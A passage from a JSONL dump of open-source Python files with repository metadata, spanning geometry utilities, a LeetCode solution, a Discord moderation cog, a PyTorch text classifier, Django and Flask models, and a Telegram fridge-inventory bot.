np.linalg.norm(v1) # unit vector of v1\n unit_v2 = v2 / np.linalg.norm(v2) # unit vector of v2\n dp = np.dot(unit_v1, unit_v2) # dot product\n angle = np.arccos(dp) # calculate inverse cos to get the angle\n \n if unit == 'degree': return np.rad2deg(angle)\n elif unit == 'radian': return angle\n else: print('Wrong keyword for unit')\n \n#%%\ndef points2vec(p1, p2):\n '''\n It calculates the vector from two points.\n \n Input\n -------\n p1: A 2d or 3d point. It is the start point. Example: [20, 30]\n p2: A 2d or 3d point. It is the end point. Example: [20, 30]\n \n Output\n -------\n Output vector in list format.\n \n Example:\n p1 = [10, 20, 10]\n p2 = [20, 40, 30]\n \n vec = points2vec(p1, p2)\n \n '''\n assert len(p1)==len(p2), 'Lenght of two points are not equal'\n \n # If points are in list or tuple, convert to numpy array\n if isinstance(p1, (list, tuple)): p1 = np.array(p1)\n if isinstance(p2, (list, tuple)): p2 = np.array(p2)\n \n return list(p2 - p1)\n \n#%%\ndef sampling(voxels, p1_idx=0, step=5, step_range=(1,5), angle_range=(5,30), rate=0.2, verbose=False):\n '''\n It samples points from a set of points. Step size will be high For points that\n are almost in the same direction. Otherwise, step size will decrease.\n \n Procedure\n -----------\n - Select three points p1, p2, and p3 using the step parameter\n - Calculate two vectors v12 and v13\n - Find angle between v12 and v13\n - Based on the angle, change step size\n \n Input\n -----------\n voxels: list of points. Example: [[x1,y1,z1], [x2,y2,z2], ...]\n p1_idx: index of the first sampleing point\n step: step size\n step_range: min and max allowed value for step size\n angle_range: min and max value of angle. Beyond that, step size will be changed accordingly\n rate: 0.2 means 20% increment or decrement of step size\n verbose: (bool) whether to allow printing\n \n Output\n -----------\n sample_points: a list that contains sampled points\n \n Example:\n -----------\n \n # Read 3d data stored in .mat format\n data = sio.loadmat('s.mat') # contains one canal\n vol = data['cc4'] # get volume\n \n voxels = np.argwhere(vol==1) # get voxels\n voxels = voxels.tolist() # convert to list\n \n sample_points = sampling(voxels, p1_idx=0, step=5, step_range=(1,5), \n angle_range=(5,30), rate=0.2, verbose=False)\n '''\n sample_points = []\n \n while(True):\n \n # Ensure limits of step size\n if step > step_range[1]: \n step = step_range[1]\n if verbose: print('Truncating to max_step')\n \n if step < step_range[0]:\n step = step_range[0]\n if verbose: print('Truncating to min_step')\n \n # Get indices of 2nd and 3rd points\n p2_idx = int(p1_idx + step)\n p3_idx = int(p2_idx + step) \n \n # Stopping criterion: If p1_idx exceeds range, then append last voxel, and then break \n if p1_idx >= len(voxels)-1: \n sample_points.append(voxels[-1])\n if verbose: print('Terminating as p1_idx exceeds range')\n break\n \n # Stopping criterion: If p2_idx exceeds range, then append p1 and last voxel, and then break \n if p2_idx >= len(voxels)-1: \n sample_points.append(voxels[p1_idx])\n sample_points.append(voxels[-1])\n if verbose: print('Terminating as p2_idx exceeds range')\n break\n \n # Stopping criterion: If p3_idx exceeds range, then append p1, p2 and last voxel, and then break \n if p3_idx >= len(voxels)-1: \n sample_points.append(voxels[p1_idx])\n sample_points.append(voxels[p2_idx])\n sample_points.append(voxels[-1])\n if verbose: print('Terminating as p3_idx exceeds range')\n break\n \n # Calcuate vectors p1p2 and p2p3\n v12 = points2vec(voxels[p1_idx], voxels[p2_idx])\n v23 = points2vec(voxels[p2_idx], voxels[p3_idx])\n \n # Calculate angle between vectors\n angle = vec2angle(v12, v23, unit='degree')\n if verbose: print('Angle: ', angle)\n \n # Redefine step size based on angle\n if angle >= angle_range[0] and angle <= angle_range[1]: \n if verbose: print('Step size -- no change')\n pass # no need to change step size\n elif angle < angle_range[0]: \n step = step * (1 + rate) # increase step size\n if verbose: print('Step size -- increased')\n elif angle > angle_range[1]: \n step = step * (1 - rate) # reduce step size\n if verbose: print('Step size -- decreased')\n # continue # do this sampling again, no sample will be appended\n \n # Store sample points p1 and p2. Don't need to store p3, it will stored in\n # the next iteration as it will become p1 then.\n sample_points.append(voxels[p1_idx])\n sample_points.append(voxels[p2_idx])\n # sample_points.append(voxels[p3_idx])\n \n # Update index of the first point\n p1_idx = p3_idx\n \n return sample_points \n \n#%%\ndef create_vol(shape, dtype, voxels, data):\n '''\n It creates volume based on given voxels and data\n \n Input\n -------\n shape: shape of the volume\n dtype: data type\n voxels: voxels of the volume that will contain a specific value\n data: value that voxels will contain\n \n Output\n --------\n vol: a 3D volume\n \n '''\n \n if isinstance(voxels, list): voxels = np.array(voxels)\n \n vol = np.zeros(shape, dtype)\n vol[voxels[:,0], voxels[:,1], voxels[:,2]] = data\n \n return vol\n\n#%%\ndef xyz2asc(data, name):\n '''\n It writes x, y, and z values to a .asc file.\n '''\n f = open(name, 'w')\n for d in data: print(\"%f %f %f\" % (d[0], d[1], d[2]), file=f)\n f.close()\n\n","repo_name":"mrinal054/my_utils","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29156382855","text":"\"\"\"\n给你一棵所有节点为非负值的二叉搜索树,请你计算树中任意两节点的差的绝对值的最小值。\n\n示例:\n输入:\n 1\n \\\n 3\n /\n 2\n输出:\n1\n解释:\n最小绝对差为 1,其中 2 和 1 的差的绝对值为 1(或者 2 和 3)。\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def getMinimumDifference(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n val_list = []\n queue = [root]\n\n while queue:\n node = queue.pop(0)\n val_list.append(node.val)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n\n val_list.sort()\n min_diff = val_list[1] - val_list[0]\n\n for index in range(2, len(val_list)):\n temp = abs(val_list[index] - val_list[index-1])\n if min_diff > temp:\n min_diff = temp\n if min_diff == 0:\n return 0\n return min_diff\n","repo_name":"XinZhaoFu/leetcode_moyu","sub_path":"530二叉搜索树的最小绝对差.py","file_name":"530二叉搜索树的最小绝对差.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33541080261","text":"import discord\nfrom discord.ext import commands\n\nfrom constants import roles\nfrom utils import logger\n\n\nclass Message(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(description = \"Delete N last messages\")\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def purge(self, ctx, number_of_messages = 1):\n \"\"\"Delete n number of messages in a channel\"\"\"\n\n await ctx.channel.purge(limit = int(number_of_messages + 1))\n embed = discord.Embed(\n colour = discord.Colour.red(),\n description = str(number_of_messages) + \" messages deleted in \" + ctx.message.channel.mention,\n )\n\n embed.set_author(name = ctx.author.nick, icon_url = ctx.author.avatar_url)\n\n await logger.log_action(ctx.guild, embed)\n\n @commands.command(aliases=[\"msg-echo\"])\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def echo(self, ctx, channel: discord.TextChannel, *, message = None):\n \"\"\"Send message to a channel as the bot\"\"\"\n\n files = []\n for attachment in ctx.message.attachments:\n files.append(await attachment.to_file())\n await channel.send(content = message, files = files)\n\n @commands.command(aliases=[\"msg-publish\"])\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def publish(self, ctx, channel: discord.TextChannel, *, message = None):\n \"\"\"Send message to a channel as the bot and publish it\"\"\"\n \n files = []\n for attachment in ctx.message.attachments:\n files.append(await attachment.to_file())\n message = await channel.send(content = message, files = files)\n await message.publish()\n\n @commands.command(aliases=[\"msg-edit\"])\n @commands.has_any_role(roles.ADMINISTRATOR, roles.MODERATOR)\n async def edit(self, ctx, channel: discord.TextChannel, id: int, *, new_message):\n \"\"\"Edit message sent as the bot\"\"\"\n\n message = await channel.fetch_message(id)\n await message.edit(content = new_message)\n\n\ndef setup(bot):\n bot.add_cog(Message(bot))\n","repo_name":"EnisMulic/MSG-Z","sub_path":"cogs/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11102509727","text":"import numpy as np\n\ndef Toy_Time_Series(ff, time, \n n_series_for_cluster = 10, \n n_cluster = 3,\n random_state = None,\n r_ampl = None,\n r_off = None,\n iterargs = None, \n **kwargs\n ):\n \"\"\"\n --------------------------\n |\n | Author: Edoardo Gabrielli\n |\n --------------------------\n |\n | DESCRIPTION:\n | Function that build a toy model for a time series clustering problem.\n |\n --------------------------\n |\n | INPUT PARAMETERS:\n | - ff: func\n | The function that rules the toy model. This function need one argument:\n | 1) x: numpy nd-array, shape: (n_series_for_cluster, time) \n | This represent the array that will be filled with the function (for one single cluster)\n | Optional:\n | 2) **kwargs (anything you want) other parameters that you need for the model \n | Example: \n | def ff(x, q = 0, phi=0):\n | return np.sin(x + phi) + q \n | \n | - time: numpy 1d array\n | Time step in wich every series will be evaluated.\n | \n | - n_series_for_cluster: int, default = 10\n | Number of time series for clusters.\n | \n | - n_cluster: int, default = 3\n | Number of clusters.\n | \n | - random_state: int, default = None\n | Numpy seed for reproducibility. \n | If none it will not set the seed.\n | \n | - r_ampl: int or float (positive), default = None\n | Amplitude of random fluctuation on the function func.\n | If None the random fluctiation is deactivated.\n | \n | - r_off: int or float (positive), default = None\n | Random offset on the y axis for the function func. Usefull to separate different time series of\n | the same cluster.\n | If None no offset will be applied to func.\n | \n | - iterargs: list of dict of shape (n_cluster, ), default = None\n | Iterable argument for the function ff (if you wanna pass different argument to different clusters).\n | If None the algorithm do not pass anithing to the function here (but it will still pass **kwargs).\n | \n | - **kwargs: \n | All the parameters that the function \"ff\" needs (in the previous example you need to pass phi here).\n | \n ------------------------\n |\n | OTPUT PARAMETERS:\n | - yy: numpy nd-array of shape (n_cluster * n_series_for_cluster, len(time)) \n | Matrix with the data for the clustering task.\n |\n ------------------------ \n FULL EXAMPLES OF USAGE:\n 1) Use of **kwargs\n >>> def func(x, q = 0, phi = 0):\n >>> return np.sin(x + phi) + q\n >>> n = 100\n >>> xx = np.linspace(0, 2*np.pi, n)\n >>> yy = Time_Series_Cluster_Building(func, xx, q = 1, phi = 3)\n \n 2) Use of iterargs and **kwargs with plot:\n >>> def func(x, q = 0, phi = 0):\n >>> return np.sin(x + phi) + q\n >>> n = 100\n >>> iters = [dict(phi=2), dict(phi=3), dict(phi=4)]\n >>> xx = np.linspace(0, 2*np.pi, n)\n >>> yy = Time_Series_Cluster_Building(func, xx, q = 0, iterargs=iters)\n >>> plt.plot(yy.T)\n >>> plt.show()\n \"\"\"\n # Some useful function...\n def add_noise(xx, r_ampl, r_off):\n \"\"\"\n Evaluate noise for the group of curve of a single cluster.\n \"\"\"\n if r_ampl != None:\n ampls = np.random.rand(*(xx.shape))*r_ampl # Random noise on amplitude\n else:\n ampls = np.zeros(xx.shape)\n if r_off != None:\n offs_num = (2*np.random.rand(xx.shape[0])-1)*r_off # Random noise on y offset\n offs = np.broadcast_to(offs_num, xx.T.shape).T # Brodcasting to adjust dimention\n else:\n offs = np.zeros(xx.shape)\n return ampls + offs\n \n ############################################\n if random_state != None:\n np.random.seed(random_state)\n \n step = len(time)\n xx = np.full(shape = ( n_series_for_cluster * n_cluster, step ), # Build matrix of \n fill_value=time ) # flat lines of the right shape\n\n yy = np.empty(xx.shape) # Empty array (this will contain the final time series)\n \n if iterargs==None:\n for i in range(n_cluster):\n lower_bond = i * n_series_for_cluster\n upper_bond = (i + 1) * n_series_for_cluster\n yy[lower_bond: upper_bond, :] = ff(xx[lower_bond: upper_bond, :], **kwargs)\n yy[lower_bond: upper_bond, :] += add_noise(xx[lower_bond: upper_bond, :], r_ampl, r_off)\n else: \n for i, others in zip(range(n_cluster), iterargs):\n lower_bond = i * n_series_for_cluster\n upper_bond = (i + 1) * n_series_for_cluster\n yy[lower_bond: upper_bond, :] = ff(xx[lower_bond: upper_bond, :], **others, **kwargs)\n yy[lower_bond: upper_bond, :] += add_noise(xx[lower_bond: upper_bond, :], r_ampl, r_off)\n return yy","repo_name":"cri98li/Data-Mining-2-Project-ts-classification","sub_path":"notebooks lezione/Time_Series_functions.py","file_name":"Time_Series_functions.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36133559500","text":"#coding=utf-8\nimport torch.nn.functional as F\nfrom model.TCN import *\nfrom model.cnn import Conv1d\n\n\n# 不使用上下文信息进行对比实验\nclass CRFA_withoutContext(nn.Module):\n\n def __init__(self, dropout, embedding_dim, output_size, txt_vocab_size, concept_vocab_size, batch_size, hidden_size):\n\n super(CRFA_withoutContext, self).__init__()\n self.dropout = dropout\n self.embedding_dim = embedding_dim\n\n self.dropout = nn.Dropout(dropout)\n self.output_size = output_size\n\n self.word_embed = nn.Embedding(txt_vocab_size, embedding_dim)\n self.batch_size = batch_size\n self.hidden_size = hidden_size\n self.vocab_size = txt_vocab_size\n\n self.word_weight = nn.Parameter(torch.rand(embedding_dim, 1))\n self.cpt_weight = nn.Parameter(torch.rand(embedding_dim, 1))\n\n self.W_word_2 = nn.Parameter(torch.rand(1, 1))\n self.W_word_cpt = nn.Parameter(torch.rand(1, 1))\n\n self.W2 = nn.Linear(hidden_size, hidden_size)\n self.w2 = nn.Linear(hidden_size, hidden_size, bias=False)\n\n self.cpt_word_embed = nn.Embedding(concept_vocab_size, embedding_dim)\n\n self.tcn = TCN(embedding_dim=embedding_dim, output_size=hidden_size, num_channels=[100, 100, 100], kernel_size=2,\n dropout=0.5, emb_dropout=0.25)\n\n self.con1 = Conv1d(embedding_dim, embedding_dim, [1, 1])\n # Fully-Connected Layer\n self.relu = nn.ReLU()\n self.fc = nn.Linear(1800, self.output_size)\n\n def word_attention(self, input_sentences):\n '''S\n 在 每句话中,每个词由不同的重要性,我们赋予不同的权重,得到词的特征表示\n '''\n # h为上下文的表示\n # print(\"input_sentenses: \", input_sentences.shape) torch.Size([64, 29, 300])\n # h = self.tcn(input_sentences) # (64, 26, 128)\n u = torch.relu(torch.matmul(input_sentences, self.word_weight)) # 64, 30, 1\n # print(\"u--------\", u.shape)\n # print(\"u\", (torch.matmul(u, self.W_word_2).permute(0, 2, 1)/math.sqrt(self.hidden_size)))\n alpha1 = F.softmax(torch.matmul(u, self.W_word_2).permute(0, 2, 1), dim=2)\n # print(\"alpha1-------------\", alpha1.shape) # 64, 1, 30\n S = torch.bmm(alpha1, input_sentences) # torch.Size([64, 1, 300])\n # print(\"S.shape--------------\", S.shape)\n return S\n\n def cpt_attention(self, input_sentence):\n '''\n 在 每句话中,每个词由不同的重要性,我们赋予不同的权重,得到词的特征表示\n '''\n # h为上下文的表示\n # h = self.tcn(input_sentence)\n u = torch.relu(torch.matmul(input_sentence, self.cpt_weight)) # torch.Size([64, 26, 1])\n # print(\"u_cpt-------\", u.shape)\n alpha1 = torch.softmax(torch.matmul(u, self.W_word_cpt).permute(0, 2, 1), dim=2) # torch.Size([64, 1, 26])\n # print(\"alpha_cpt------\", alpha1.shape)\n S = torch.bmm(alpha1, input_sentence) # torch.Size([64, 1, 300])\n # print(\"s_cpt------\", S.shape)\n return S\n\n def forward(self, x, cpt_word):\n\n # 1. word encoder-attention\n encoded_sents = self.word_embed(x) # batch_size, sen_len, d_model 64,30,300\n # 1.1 word feature encoder\n # print(\"encoded_sents-----------\", encoded_sents.shape)\n x = self.dropout(encoded_sents)\n res_begin = x\n x = self.word_attention(x)\n # print(\"x1------\", x.shape)\n output_begin = x.squeeze(1)\n # print(\"output_begin-------\", output_begin.shape)\n # 1.2 res_first stage\n x = self.con1(res_begin)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n res_mid = x\n x = self.word_attention(x)\n output_mid = x.squeeze(1)\n # print(\"output_mid------\", output_mid.shape)\n # 1.3 res_two stage\n x = self.con1(res_mid)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n x = self.word_attention(x)\n output_third = x.squeeze(1)\n # print(\"output_third------\", output_third.shape)\n# ------------------------------------------------------------\n# '''\n # 2. cpt encoder-attention\n input_cpt = self.cpt_word_embed(cpt_word) # [batch_sizes,17,embedding_dim ]\n # print('input_cpt--------', input_cpt)\n # cpt_attention = self.cpt_attention(input_cpt).transpose(0, 1).squeeze(0)\n x = self.dropout(input_cpt)\n cpt_res_begin = x\n x = self.cpt_attention(x)\n cpt_output_begin = x.squeeze(1)\n\n # 1.2 res_first stage\n x = self.con1(cpt_res_begin)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n cpt_res_mid = x\n x = self.cpt_attention(x)\n cpt_output_mid = x.squeeze(1)\n\n # 1.3 res_two stage\n x = self.con1(cpt_res_mid)[-1].permute(0, 2, 1)\n x = self.dropout(x)\n x = self.cpt_attention(x)\n cpt_output_third = x.squeeze(1)\n # '''\n\n\n A = torch.cat((output_begin, output_mid, output_third, cpt_output_begin, cpt_output_mid, cpt_output_third), -1)\n # A = torch.cat((output_begin, output_mid, output_third), -1)\n\n logits = self.fc(A)\n # print(\"logits--------\", logits.shape) # [64, 7]\n\n return logits\n","repo_name":"smilegnt/CRFA","sub_path":"model/CRFA_withoutContext.py","file_name":"CRFA_withoutContext.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23707002283","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\n\n\nclass GrowingFertilizer(models.Model):\n \"\"\"\n Represents a fertilizer with nutrient composition.\n\n Fields:\n user (ForeignKey): Reference to the user who added this fertilizer.\n name (CharField): The brand name of the fertilizer.\n description (TextField): A description of the fertilizer.\n nitrogen (DecimalField): The percentage of nitrogen(N) content.\n phosphorus (DecimalField): The percentage of phosphorus(P) content.\n potassium (DecimalField): The percentage of potassium(K) content.\n added_on (DateTimeField): The date and time when the fertilizer was added.\n \"\"\"\n\n user = models.ForeignKey(\n get_user_model(),\n on_delete=models.CASCADE,\n null=True\n )\n name = models.CharField(\n max_length=100,\n blank=True,\n help_text='Brand name of the fertilizer.'\n )\n description = models.TextField(\n blank=True,\n help_text='Description of the fertilizer.'\n )\n nitrogen = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n help_text='Percentage of nitrogen content in the fertilizer.'\n )\n phosphorus = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n help_text='Percentage of phosphorus content in the fertilizer.'\n )\n potassium = models.DecimalField(\n max_digits=5,\n decimal_places=2,\n help_text='Percentage of potassium content in the fertilizer.'\n )\n added_on = models.DateTimeField(\n auto_now_add=True\n )\n\n def __str__(self):\n return f\"{self.name} (N:{self.nitrogen}% P:{self.phosphorus}% K:{self.potassium}%)\"\n\n class Meta:\n ordering = ['-added_on']\n","repo_name":"RafaelPuello/CyBotany","sub_path":"apps/botany/models/growing_fertilizer.py","file_name":"growing_fertilizer.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20988025703","text":"from ..models import User, Course, User_Courses, db\nfrom flask_login import current_user\nfrom flask import jsonify\n\ndef addCourses(course_names,semesters_,status_):\n if len(semesters_)!=len(course_names):\n return jsonify({'message':'ERROR, courses and semesters dont line up',\n 'status':'400'})\n for e in range(len(course_names)):\n #check if course is already in courses table:\n courseCheck = Course.query.filter_by(course_name=course_names[e],semester=semesters_[e]).first()\n if courseCheck is None:\n course_=Course(course_name=course_names[e],semester=semesters_[e])\n db.session.add(course_)\n db.session.commit()\n courseCheck = Course.query.filter_by(course_name=course_names[e],semester=semesters_[e]).first()\n\n \n course_=User_Courses(user_id=current_user.id,course_id=courseCheck.course_id, status = status_ )\n db.session.add(course_)\n db.session.commit()\n \n return jsonify({'message':'Sucessfully added courses',\n 'status':'200'})\n\ndef deleteCourses(course_names,semesters_):\n if len(semesters_)!=len(course_names):\n return jsonify({'message':'ERROR, courses and semesters dont line up',\n 'status':'400'})\n \n for e in range(len(course_names)):\n course_= User_Courses.query.filter_by(user_id=current_user.id).join(Course).filter_by(course_name=course_names[e],semester = semesters_[e]).first()\n if course_ is not None:\n db.session.delete(course_)\n db.session.commit()\n else:\n return jsonify({\"message\":\"invalid course name entered\",\n \"status\": \"400\"})\n \n return jsonify({\"message\":\"successfuly deleted course\",\n 'status':'200'})\n\ndef getCourses():\n # courses = Course.query.join(User_Courses).filter_by(user_id=current_user.id).all()\n # courses = User_Courses.query.filter_by(user_id=current_user.id).join(Course).all()\n courses=Course.query.join(User_Courses).filter(User_Courses.user_id==current_user.id)\\\n .add_columns(User_Courses.status,Course.course_name,Course.semester).all()\n return jsonify({'courses': [{'id': course.course_name, 'semester': course.semester, 'status':course.status} for course in courses]})\n\n ","repo_name":"rashidkolaghassi/CourseConnects","sub_path":"app/functions/courses_functions.py","file_name":"courses_functions.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"33503202373","text":"\"\"\" write DOE from YAML file \"\"\"\n\nimport sys\nimport importlib\n\nfrom pp.config import CONFIG\nfrom pp.doe import load_does\nfrom pp.write_doe import write_doe\n\n\ndef import_custom_doe_factories():\n \"\"\" Find if we have custom DOEs on this config.\n Make them available in component_type2factory\n \"\"\"\n\n sys.path += [CONFIG[\"mask_root_directory\"]]\n if CONFIG[\"custom_components\"]:\n try:\n importlib.import_module(CONFIG[\"custom_components\"])\n except Exception:\n pass\n\n\ndef write_doe_from_yaml(filepath):\n \"\"\" Loads DOE settings from yaml file and writes GDS into build_directory\n\n Args:\n filepath: YAML file describing DOE\n\n Returns:\n gdspaths: list\n\n For each DOE save:\n\n - GDS\n - json metadata\n - ports CSV\n - markdown report, with DOE settings\n \"\"\"\n does = load_does(filepath)\n\n gdspaths = []\n for doe_name, doe in does.items():\n # print(doe_name)\n # print(doe.get(\"settings\"))\n # print(doe.get(\"do_permutations\"))\n # print(doe)\n # print(list(doe.keys()))\n # print(type(doe.get('settings')))\n # assert type(doe.get('settings'))\n d = write_doe(\n component_type=doe.get(\"component\"),\n doe_name=doe_name,\n do_permutations=doe.get(\"do_permutations\", True),\n list_settings=doe.get(\"settings\"),\n description=doe.get(\"description\"),\n analysis=doe.get(\"analysis\"),\n test=doe.get(\"test\"),\n functions=doe.get(\"functions\"),\n )\n gdspaths.append(d)\n return gdspaths\n\n\ndef test_write_doe_from_yaml():\n does_path = CONFIG[\"samples_path\"] / \"mask\" / \"does.yml\"\n gdspaths = write_doe_from_yaml(does_path)\n print(gdspaths)\n\n\nif __name__ == \"__main__\":\n test_write_doe_from_yaml()\n","repo_name":"PsiQ/gdsfactory","sub_path":"pp/write_doe_from_yaml.py","file_name":"write_doe_from_yaml.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"16"} +{"seq_id":"23665084109","text":"import logging\r\nimport datetime\r\nfrom ocr import *\r\nfrom fridge import *\r\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, KeyboardButton, ReplyKeyboardMarkup, PhotoSize\r\nfrom telegram.ext import Updater, CommandHandler, CallbackQueryHandler, MessageHandler, Filters, RegexHandler,ConversationHandler, InlineQueryHandler, JobQueue, RegexHandler\r\n\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\r\n level=logging.INFO)\r\n\r\nlogger = logging.getLogger(__name__)\r\nknownUser = {}\r\ncommands = {\r\n \"start\" : 'Initialise User',\r\n \"help\" : 'Gives you information about the available commands',\r\n \"add\" : \"Adds food item into your fridge\",\r\n \"used\" : \"Removes food item from fridge\",\r\n \"display\" : \"See what's in your Fridge\",\r\n \"clear\" : \"Resets your fridge\",\r\n \"scan\" : \"Send a photo of your receipt\",\r\n \"addexpiry\" : \"Add expiry date for items\"\r\n }\r\n\r\n#/start\r\n\r\ndef start(bot, update):\r\n cid = update.message.chat_id\r\n if cid not in knownUser:\r\n fridge = Fridge()\r\n knownUser[cid]=fridge\r\n bot.send_message(chat_id=cid, text=\"Hello! This bot helps you to reduce food wastage by managing your fridge.\")\r\n #create a instance of fridge\r\n else:\r\n bot.send_message(chat_id=cid, text=\"User Data already stored!\")\r\n help(bot, update)\r\n\r\n#/Help\r\n\r\ndef help(bot, update):\r\n cid = update.message.chat_id\r\n help_text = \"The following commands are available: \\n\"\r\n for key in commands.keys():\r\n help_text += \"/\" + key + \": \"\r\n help_text += commands[key] + \"\\n\"\r\n bot.send_message(chat_id=cid, text=help_text)\r\n\r\n#USED FOR /Add\r\n\r\ncat = [\"FRUITS\", \"VEGETABLES\", \"MEAT\", \"DAIRY PRODUCTS\", \"OTHERS\"]\r\nCAT, FOOD, OTHERS, EXPIRE= range(4)\r\n\r\ndef add(bot, update):\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n update.message.reply_text('What would you like to add? \\n Please choose:', reply_markup=reply_markup)\r\n return CAT\r\n\r\ndef button(bot, update, user_data):\r\n query = update.callback_query\r\n cid = query.message.chat_id\r\n cat = knownUser[cid].get_category(query.data)\r\n user_data[\"Cat\"]= query.data\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n bot.edit_message_text(text=\"{} Selected\".format(query.data),\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id, reply_markup=reply_markup)\r\n return FOOD\r\n\r\ndef button1(bot, update, user_data):\r\n query = update.callback_query\r\n if query.data== \"Others\":\r\n bot.edit_message_text(text=\"What is the item?\",\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n return OTHERS\r\n else:\r\n user_data[\"fruit\"]= query.data\r\n keyboard = [[\"1\",\"2\",\"3\"],[\"4\",\"5\",\"6\"], [\"7\", \"8\", \"9\"],[\"0\",]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard= True, one_time_keyboard= True)\r\n bot.edit_message_text(text=\"Selected option: {}\".format(query.data),\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n bot.send_message(chat_id=query.message.chat_id, text= \"How many days to expiry?\", reply_markup = reply_markup)\r\n return EXPIRE\r\n\r\ndef newItem(bot, update, user_data):\r\n text = update.message.text.upper()\r\n user_data['fruit'] = text\r\n cid=update.message.chat_id\r\n knownUser[cid].add_entry_to_cat(text, user_data[\"Cat\"])\r\n keyboard = [[\"1\",\"2\",\"3\"],[\"4\",\"5\",\"6\"], [\"7\", \"8\", \"9\"],[\"0\",]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard= True, one_time_keyboard= True)\r\n bot.send_message(chat_id=cid, text= \"When will it expire?\", reply_markup= reply_markup)\r\n return EXPIRE\r\n\r\ndef expire(bot, update, user_data):\r\n text = update.message.text\r\n user_data['expire'] = text\r\n new= Food(user_data[\"fruit\"], int(user_data['expire']), user_data[\"Cat\"]) #food inital\r\n cid=update.message.chat_id\r\n knownUser[cid].add_food(new) #add food to fridge\r\n bot.send_message(chat_id=cid, text= \"Item Successfully Added\")\r\n return ConversationHandler.END\r\n\r\ndef cancel(bot, update):\r\n update.message.reply_text('Bye!')\r\n return ConversationHandler.END\r\n\r\n#/remove\r\nUSED , REMOVED = range(2)\r\ncat = [\"FRUITS\", \"VEGETABLES\", \"MEAT\", \"DAIRY PRODUCTS\", \"OTHERS\"]\r\n\r\ndef used(bot, update):\r\n cid = update.message.chat_id\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n update.message.reply_text('Please choose what you want to remove:', reply_markup=reply_markup)\r\n return USED\r\n\r\ndef button2(bot, update, user_data):\r\n query = update.callback_query\r\n cid = query.message.chat_id\r\n cat = knownUser[cid].print_by_category(query.data) #get whole inventory for fride\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n bot.edit_message_text('Please choose what you would like to remove:',\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id, reply_markup=reply_markup)\r\n return REMOVED\r\n\r\ndef remove(bot, update, user_data):\r\n query = update.callback_query\r\n cid = query.message.chat_id\r\n knownUser[cid].remove_food(query.data) #remove food\r\n bot.edit_message_text(text=\"{} has been removed\".format(query.data),\r\n chat_id=query.message.chat_id,\r\n message_id=query.message.message_id)\r\n return ConversationHandler.END\r\n\r\n#/dísplay\r\ndef display(bot, update):\r\n cid = update.message.chat_id\r\n res = knownUser[cid].print_full_fridge() #print food name list\r\n bot.send_message(chat_id=cid, text=res)\r\n\r\n#/time\r\n\r\ndef alert(bot,job):\r\n for k,v in knownUser.items():\r\n res = v.daily_update() #Get list of expired\r\n try:\r\n bot.send_message(chat_id=k, text = res)\r\n except:\r\n continue\r\n\r\n#/clear\r\nCLEAR = 0\r\n\r\ndef clear(bot, update):\r\n cid = update.message.chat_id\r\n keyboard = [[\"Yes\"],[\"No\"]]\r\n reply_markup = ReplyKeyboardMarkup(keyboard,resize_keyboard = True, one_time_keyboard = True)\r\n update.message.reply_text('Are you sure you want to clear your fridge?', reply_markup = reply_markup)\r\n return CLEAR\r\n\r\ndef cfm_Clear(bot, update):\r\n text = update.message.text\r\n cid=update.message.chat_id\r\n if text == \"Yes\":\r\n knownUser[cid].clear()\r\n keyboard = [[InlineKeyboardButton(text= k, callback_data = k)] for k in cat]\r\n reply_markup = InlineKeyboardMarkup(keyboard)\r\n bot.send_message(chat_id=cid, text= \"Fridge has been cleared\")\r\n return 